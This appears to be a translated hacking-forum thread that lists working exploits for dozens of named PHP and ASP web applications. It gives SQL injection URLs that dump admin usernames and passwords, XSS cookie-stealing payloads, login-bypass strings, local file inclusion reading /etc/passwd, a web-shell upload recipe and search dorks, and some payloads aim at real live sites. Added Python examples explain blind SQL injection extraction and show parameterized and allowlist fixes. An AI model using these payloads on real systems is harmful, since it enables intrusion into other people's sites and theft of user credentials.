PRO-search XSS: vulnerabilities in the parameters prot, host, path, name, ext, size, search_days, show_page
Code:
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Web Directory Script <= 2.0 (name) SQL Injection Vulnerability
magic_quotes_gpc = Off
http://localhost/[installdir]/
Exploit:
Code:
listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*
http://milw0rm.com/exploits/6298

Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities
magic_quotes_gpc = Off
http://localhost/[installdir]/
Exploit:
Code:
index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Code:
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Dork: made by matterdaddy
http://milw0rm.com/exploits/6297
(c) ~!Dok_tOR!~
iFdate <= 2.0.3 Remote SQL Injection Vulnerability
Condition: magic_quotes_gpc = Off
http://localhost/[installdir]/members_search.php
Search Name/Nickname
Exploit 1:
Code:
' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
Exploit 2:
Code:
' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
http://milw0rm.com/exploits/6315
(c) ~!Dok_tOR!~
Battle Scrypt SQL Injection
Author: ~!Dok_tOR!~
Date found: 26.08.08
Product: Battle Scrypt
Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Code:
http://localhost/[installdir]/search.php
Model Name:
Exploit:
Code:
' union select 1,user(),3/*
Code:
http://localhost/[installdir]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*

Big Fat Rate My Photo AdSense Website SQL Injection
Author: ~!Dok_tOR!~
Date found: 29.08.08
Product: Big Fat Rate My Photo AdSense Website
Price: $14.99
URL: www.dotcomallsorts.com
Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website.rar
Vulnerability Class: SQL Injection
Exploit 1:
Code:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
Exploit 2:
Code:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
Admin panel:
Code:
http://localhost/[installdir]/admin/

Article Publisher Pro <= v1.5 SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Article Publisher Pro v1.5
Price: $75
URL: www.phparticlescript.com
Vulnerability Class: SQL Injection
Exploit 1:
Code:
http://localhost/[installdir]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
Exploit 2:
Code:
http://localhost/[installdir]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
Dork: All rights reserverd © Your Articles Pro 2002-2005 Copyright 2006 - 2008, Article Publisher PRO v1.5

Keepsakes SQL Injection
Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: Keepsakes
Price: $25
URL: harlandscripts.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Code:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
Opera -> Source (Ctrl+F3)
Exploit 2:
Code:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
Opera -> Source (Ctrl+F3)
Exploit 3:
Code:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
Opera -> Source (Ctrl+F3)
Exploit 4:
Code:
http://localhost/[installdir]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Exploit 5:
Code:
http://localhost/[installdir]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Admin panel:
Code:
http://localhost/[installdir]/admin/
Dork: Copyright Your Keepsakes ® ™ 2007

Smart Traffic 6 in 1 SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Smart Traffic 6 in 1
Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit:
Code:
http://localhost/[installdir]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*

TopCoolive SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: TopCoolive
URL: www.vetton.ru
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Code:
http://localhost/[installdir]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 2:
Code:
http://localhost/[installdir]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 3:
Code:
http://localhost/[installdir]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*

Warez Script (by Mikel Dean) SQL Injection
Author: ~!Dok_tOR!~
Date found: 27.08.08
Product: Warez Script
Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Code:
http://localhost/[installdir]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
Exploit 2:
Code:
http://localhost/[installdir]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
Code:
http://localhost/[installdir]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
Admin Authentication Bypass
Code:
http://localhost/[installdir]/v2/login.php
User: 1' or 1=1/*
Pass: 1' or 1=1/*
(c) ~!Dok_tOR!~
An exploit for E-Php CMS (http://milw0rm.com/exploits/6483) from the developer www.ephpscripts.com was posted on milw0rm, so I decided to check the rest of their projects for vulnerabilities (the table and column names were not given; they are the same across all of their scripts).

E-Php B2B Trading Marketplace Script (listings.php cid) Remote SQL Injection Vulnerability
Exploit:
http://www.site.com/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/*
Example:
http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/*

E-Php Shop Script (search_results.php cid) Remote SQL Injection Vulnerability
Exploit:
http://www.site.com/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpb2b_admin/*
Example:
http://www.ephpscripts.com/demo/yng_wineshop/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpscri_b2badeel.ephpb2b_admin/*
Fundlink SQL:
Code:
site.com/showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
PHP-Newsletter SQL:
Code:
site/index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1
Com Endeavors SQL:
Code:
site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2--
niccell SQL:
Code:
site.com/list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+admin_login/*
KwsPHP SQL:
Code:
site.com/index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*
Esy SQL:
Code:
site.com/sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
Code:
site.com/sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
BosClassifieds Classified Ads System SQL:
Code:
site.com/bosclassifieds/index.php?cat=[SQL]
pollBooth SQL:
Code:
site.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
RS MAXSOFT SQL:
Code:
site.com/modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
SSWD SQL:
Code:
site.com/index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*
OpenLD SQL:
Code:
site.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--
Site Sift SQL:
Code:
site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
Code:
site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Showlink SQL:
Code:
site.com/index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
eSyndiCat SQL:
Code:
site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*
Bwired SQL:
Code:
site.com/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
Md-Pro SQL:
Code:
site.com/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null from md_users where pn_uid=2/*
eMeeting Online Dating Software SQL:
Code:
site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
Code:
site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*
FlashGameScript SQL:
Code:
site.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2/*
Code:
site.com/index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2/*
Author: Dimi4
Date found: 30.10.08
Product: Image Hosting System v1.3.4
Price: n\q
URL: www.webmastersadvantage.com (http://www.1phpscripts.com/Image_Hosting_System_Script.html)
Vulnerability Class: XSS Vulnerability
Script: viewimage.php
PHP:
<?
$file = $_GET['file'];
if ($file == "") {
    header("Location: " . $server_url);
    exit;
}
.....
<img src="<?= $file ?>
Hmm.. I realized all of this was pointless... The admin panel is open.
Default path: /imageadmin/
CMS Made Simple 1.4.1, possibly older versions too.
Active XSS in the admin panel. Vulnerable parameter: the name of a new category when adding it in Content -> News -> Categories (Field Definition names are vulnerable as well).
To "make" the admin embed our code in the name, a CSRF attack is needed. The data is sent via POST, but it can be sent via GET too. Build the link:
Code:
http://path_to_CMS_dir/admin/moduleinterface.php?mact=News,m1_,addcategory,0&m1_name=[XSS]
Best loaded in a frame. The XSS will be reachable on the page:
Code:
http://path_to_CMS_dir/admin/moduleinterface.php?module=News
(c) iddqd
Ass-backwards, sure, but still
StrawBerry 1.1.1 (formerly CuteNews)
Include for the version with TXT databases:
Code:
http://localhost/example/index.php?do=../../../../db/base/users.MYD%00
An include of this kind is present in all TXT versions of StrawBerry and CuteNews.
Uploading a shell: Admin panel -> Settings -> Image management. Rename the shell to .jpg and upload it to the server. Click "rename", change the extension back to php, and you have a shell.
For StrawBerry 1.1.1, since access to the upload folder is forbidden, rename it to "../../shell.php" and get _ttp://localhost/shell.php
Active Business Directory v 2 (Auth Bypass) SQL Injection Vulnerability
script: Active Business Directory v 2
found: Ded MustD!e
exploit: http://www.activewebsoftwares.com/demoactivebusinessdirectory/account.asp
E-mail Address: ' or ' 1=1
Password: ' or ' 1=1

ASPReferral v 5.3 (Auth Bypass) SQL Injection Vulnerability
script: ASPReferral v 5.3
found: Ded MustD!e
exploit: http://www.activewebsoftwares.com/demoaspreferral/Merchant.asp
E-mail Address: ' or ' 1=1--
Password: ' or ' 1=1--
ExpressionEngine Core v. 1.6.6, and apparently other versions and modifications as well (they say it is popular abroad)
Hashing algorithm: sha1(pass) by default, or md5(pass).
XSS (by the way, this script can be used to send anyone an email from the vulnerable server, with the blog owner's address as the sender):
Code:
POST: http://test1.ru/system/utilities/email_test.php
recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script>
If install.php has not been removed:
LFI:
Code:
http://test1.ru/install.php?page=4
system_dir=system&ext=/../../1.php
// If system_dir is not "system" (the default), change it to the actual one.
LFI:
Code:
http://test1.ru/install.php?page=5
ext=/../../1.php
LFI:
Code:
http://test1.ru/install.php?page=6
ext=/../../1.php
LFI:
Code:
http://test1.ru/install.php?page=7
rebuild_config=1&ext=/../../1.php
Path disclosure:
Code:
http://test1.ru/system/utilities/admin.php
http://test1.ru/system/utilities/dbtest.php
Path disclosure (with register_globals=ON):
Code:
http://test1.ru/system/update.php?conf=1
Disclosure of user information, the DB table prefix, user IP addresses (and not only that):
The directories are not hidden by .htaccess; out in the wild, db_cache can contain interesting information:
Code:
/system/cache/sql_cache/
/system/cache/db_cache/
/system/cache/magpie_cache/
/system/cache/page_cache/
/system/cache/tag_cache/
For example: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (user information: login, e-mail, etc.)
dork: "powered by ExpressionEngine" (and there really are quite a lot of them)
Energine
Posting it here because I have gone blind and cannot find the "Vulnerabilities in free CMSes" thread.
SQL Inj:
Code:
site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*
XSS: in the search box:
Code:
"><script>alert()</script>
CMS: [ ACMS™ ]
Developer: [ http://www.acalog.com/ ]
Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ]
Bug type: [ Blind Sql Injection ]
Bug: [ coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ]
Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ]
Notably, most of the sites running this buggy CMS are in the .edu zone.
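Added example (editor's own Python, not ACMS code and not from the post above): the `coid=63+and+ascii(lower(substring((version()),1,1)))=52/*` payload tests one guess for one character; the script below turns that into full boolean-based blind extraction, with the true/false oracle simulated on SQLite instead of a live site. Assumptions not in the post: preview_course.php is taken to run `SELECT ... WHERE coid=<coid> AND catoid=<catoid>` (which is what the trailing `/*` comments away), SQLite's unicode()/substr()/sqlite_version() stand in for MySQL's ascii()/substring()/version(), the courses table is constructed sample data, and a binary search with `>` replaces the post's `=` guess so each character costs at most 7 requests.

```python
"""Boolean-based blind SQL injection, character extraction by binary search.

The oracle is simulated against an in-memory SQLite table; against a real
target it would be one HTTP request whose response either renders the
course (true) or not (false).
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE courses (coid INTEGER, catoid INTEGER, title TEXT)")
conn.execute("INSERT INTO courses VALUES (63, 2, 'CS 101')")  # constructed row


def oracle(coid_value: str) -> bool:
    """True when the assumed query still matches a course after injection.
    coid is concatenated unquoted, so magic_quotes_gpc plays no role here;
    the payload's trailing /* swallows the rest of the WHERE clause."""
    sql = f"SELECT count(*) FROM courses WHERE coid={coid_value} AND catoid=2"
    return conn.execute(sql).fetchone()[0] > 0


def char_at(expr: str, pos: int) -> str:
    """Recover character `pos` (1-based) of the SQL expression `expr` with at
    most 7 oracle calls by binary-searching the 7-bit code point range."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # Same shape as the post's payload, with '>' in place of '='.
        if oracle(f"63 and unicode(substr(({expr}),{pos},1))>{mid}/*"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract(expr: str, max_len: int = 64) -> str:
    """Pull `expr` out one character at a time. Past the end substr() yields
    '' and unicode('') is NULL, so every comparison is false and the search
    settles on 0, which marks the end of the string."""
    out = ""
    for pos in range(1, max_len + 1):
        c = char_at(expr, pos)
        if c == "\0":
            break
        out += c
    return out


if __name__ == "__main__":
    print("version via blind injection:", extract("sqlite_version()"))
```

On a real target the same loop works with `version()`, `user()` or `(select password from users limit 1)` as `expr`, one request per comparison; the `=52` form from the post needs up to 127 requests per character where the binary search needs 7.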
FAQMasterFlex vulnerabilities
Condition: magic_quotes_gpc = OFF
1. File: faq.php
Vulnerable code snippet:
PHP:
$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error());
SQL injection:
Code:
http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*
2. File: faq_admin.php
Vulnerable code snippet:
PHP:
$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error());
SQL injection:
Code:
http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*&cat_name=
Google dork: "Powered by Lethal Penguin."
http://www.lethalpenguin.net/design/faqmasterflex.php?download=true
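Added example (editor's own Python, not FAQMasterFlex's code and not from any post in this thread): the faq.php query shape quoted above, rebuilt over an in-memory SQLite database, to show why the `category_id=1'+union+select+1,2,...,4/*` payload returns other tables' data and why a bound parameter does not. The same padding-style UNION tail is what the Dok_tOR posts and the big list of `union select 1,2,concat(...),4` URLs earlier in the thread rely on, so the helper builds it generically. Assumptions not in the post: SQLite stands in for MySQL, so concat_ws()/database()/version()/user() become the `||` operator and sqlite_version(); faqs is given four columns because the payload pads the UNION to four; the admin table, its row and its hash are constructed sample data.

```python
"""UNION-based SQL injection: vulnerable string interpolation vs. a bound
parameter, with the column-padding payload the thread uses everywhere."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: the 4-column faqs table the payload implies
    plus an admin table holding what an attacker is after."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE faqs (id INTEGER, category_id INTEGER, question TEXT, answer TEXT);
        INSERT INTO faqs VALUES (1, 1, 'What is this?', 'A FAQ script');
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return conn


def faq_vulnerable(conn: sqlite3.Connection, category_id: str) -> list:
    """Mirrors mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'")
    with magic_quotes_gpc = Off: the attacker's quote closes the literal and
    the trailing /* comments out the script's own closing quote."""
    sql = f"SELECT * FROM faqs WHERE category_id = '{category_id}'"
    return conn.execute(sql).fetchall()


def faq_safe(conn: sqlite3.Connection, category_id: str) -> list:
    """Same query with a bound parameter: the whole input is one value, so
    the UNION is never parsed as SQL."""
    return conn.execute(
        "SELECT * FROM faqs WHERE category_id = ?", (category_id,)
    ).fetchall()


def union_payload(columns: int, slot: int, expr: str, table: str = "") -> str:
    """Build the padding-style UNION tail seen throughout the thread: a
    numbered placeholder for every column except `slot` (1-based), which
    carries the expression whose output the page will display."""
    cols = [expr if i == slot else str(i) for i in range(1, columns + 1)]
    tail = "' union select " + ",".join(cols)
    if table:
        tail += " from " + table
    return tail + "/*"


if __name__ == "__main__":
    db = build_db()
    # Same shape as the faq.php payload; slot 3 is the column faq.php prints.
    payload = "1" + union_payload(4, 3, "username || ':' || password", "admin")
    print("vulnerable:", faq_vulnerable(db, payload))
    print("safe:      ", faq_safe(db, payload))
```

The number of placeholders has to equal the column count of the original SELECT (hence the long `3,4,...,58` lists in the iFdate post); a mismatch is a SQL error, which is also why the `database(),version(),user()` probe is put in a slot the page is known to render.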
Textpattern v.4.0.3
Passive XSS
Code:
http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=</textarea><script>alert(document.cookie)</script>&alt=&h=1&w=400&type=textile
Code:
http://localhost/textpattern/index.php?event=log&step=list&page=1<script>alert(document.cookie)</script>
Active XSS
Write a new article => http://localhost/textpattern/index.php?event=article => put the code in the title:
Code:
<script>alert()</script>
or </title><script>alert()</script>
Categories => the "Name" field is vulnerable.
Files => the "Description" field.
Links => the "Title" and "Description" fields.
(c) iddqd
MODx 0.9.6.2
Passive XSS
Code:
/assets/modules/docmanager/includes/tv.ajax.php
POST: tplID=-1&langNoTV=<body onLoad=alert('ok')>
Code:
/assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script>
register_globals ON
Code:
/assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script>
register_globals ON
The amusing part in this case is that the XSS is in the parameter name, while the value is filtered strictly.
Path disclosures
Code:
assets/cache/siteCache.idx.php
manager/includes/rss.inc.php
manager/includes/browsercheck.inc.php
manager/includes/sniff/phpSniff.class.php
manager/includes/extenders/getUserData.extender.php
assets/snippets/ditto/formats/xml.format.inc.php
assets/snippets/ditto/formats/rss.format.inc.php
assets/snippets/ditto/formats/json.format.inc.php
assets/snippets/ditto/classes/debug.class.inc.php
assets/snippets/ditto/formats/atom.format.inc.php
assets/snippets/ditto/extenders/tagging.extender.inc.php
manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php
bbpress v1.0
File: realplay.php
Vulnerable code snippet:
Code:
<?php echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']); ?>
XSS injection:
Code:
http://path/inc/realplay.php?link=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Active XSS: in /inc/realplay.php, enter in the email field:
Code:
<script>alert()</script>
WorkingOnWeb
File: admin.inc.php
Vulnerable code snippet:
Code:
$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "") $user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "") $pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);
SQL injection:
Code:
http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
XSS injection:
Code:
http://path/wow/index.php/"><script>alert(document.cookie)</script>
iGaming CMS
File: lang.php
Vulnerable code:
Code:
if(isset($_GET['lang'])) {
    $include_lang = $_GET['lang'];
} elseif(file_exists(TOP_DIR.'/sql/db_connect.php')) {
    include_once(TOP_DIR.'/functions/db_api.php');
    $include_lang = get_language();
} else {
    $include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
Code:
http://path/docs/index.php?lang=/../../../../../../../../../../test
If magic_quotes_gpc = Off, then:
Code:
http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
File: install.php
Vulnerable code:
Code:
switch($_GET['whatlang']) {
    case 1:
        include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
        break;
    default:
        include_once(TOP_DIR.'/lang/lang.English.php');
        break;
}
Code:
http://path/install.php?whatlang=1&language=/../../../../../../../test
If magic_quotes_gpc = Off, then:
Code:
http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00
SQL injection:
Code:
http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
XSS injection:
Code:
http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Wheatblog
File: main.php
Vulnerable code snippet:
Code:
$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
Code:
http://path/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
If magic_quotes_gpc = ON, then:
Code:
http://path/main.php?config=eregi.inc.php\..\admin\.htaccess
XSS injection:
Code:
http://path/index.php?action=category&id=<script>alert(document.cookie)</script>
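Added example (editor's own Python, neither Wheatblog's nor iGaming CMS's code and not from any post in this thread): the main.php config filter quoted above re-implemented to show why the backslash payload passes it, the iGaming CMS `lang=/../../etc/passwd%00` include path as the C-level open() would see it, and an allowlist resolver that rejects both. Assumptions not in the posts: re.sub/re.search with the same patterns stand in for ereg_replace/eregi (the `.` in "../" and ".inc.php" is a regex wildcard there too); TOP_DIR and the language allowlist are constructed values; the NUL truncation reproduces the pre-PHP-5.3.4 behaviour the %00 trick depends on; nothing is opened, the functions only return the path that would be included.

```python
"""Local file inclusion: a blacklist filter bypassed, a NUL-truncated include
path, and the allowlist check that stops both."""
import ntpath
import posixpath
import re
from typing import Optional

TOP_DIR = "/var/www/docs"                  # constructed, stands in for TOP_DIR
ALLOWED_LANGS = {"English", "German"}      # constructed allowlist


def wheatblog_filter(config: str) -> str:
    """Same three replacements and the same case-insensitive '.inc.php' test
    as main.php. Only ':' and '/' are ever removed; '\\' survives untouched."""
    config = re.sub(":", "", config)
    config = re.sub("../", "", config).strip()
    config = re.sub("/", "", config).strip()
    if config == "" or not re.search(".inc.php", config, re.IGNORECASE):
        config = "config.inc.php"
    return config


def wheatblog_include_target(payload: str) -> str:
    """Where a Windows include() lands with the filtered name: the first
    component need not exist, '\\..\\' still walks up one directory."""
    return ntpath.normpath(wheatblog_filter(payload))


def igaming_include_path(lang: str, magic_quotes: bool = False) -> str:
    """TOP_DIR.'/lang/lang.'.$include_lang.'.php' as open() sees it: with
    magic_quotes_gpc Off the %00 byte ends the path and '.php' is never
    appended; with it On, addslashes() turns NUL into a literal \\0."""
    if magic_quotes:
        lang = lang.replace("\0", "\\0")
    path = TOP_DIR + "/lang/lang." + lang + ".php"
    return posixpath.normpath(path.split("\0")[0])


def safe_lang_path(lang: str) -> Optional[str]:
    """Allowlist resolver: reject NUL and both separators outright, accept
    only names from the list, then build the path from the vetted name."""
    if "\0" in lang or "/" in lang or "\\" in lang or lang not in ALLOWED_LANGS:
        return None
    return TOP_DIR + "/lang/lang." + lang + ".php"


if __name__ == "__main__":
    print(wheatblog_include_target("eregi.inc.php\\..\\admin\\.htaccess"))
    print(igaming_include_path("/../../../../../../../../../../etc/passwd\0"))
    print(safe_lang_path("English"), safe_lang_path("../etc/passwd\0"))
```

The filter's own regex metacharacters cut both ways: `ereg_replace("../", ...)` also deletes any two characters before a slash (so `../../admin/.htaccess` degrades to `adm.htaccess` and falls back to the default), yet the `.inc.php` test is satisfied by `eregi.inc.php` at the front of a name that still traverses with backslashes. Matching a fixed allowlist avoids reasoning about what a blacklist did or did not strip.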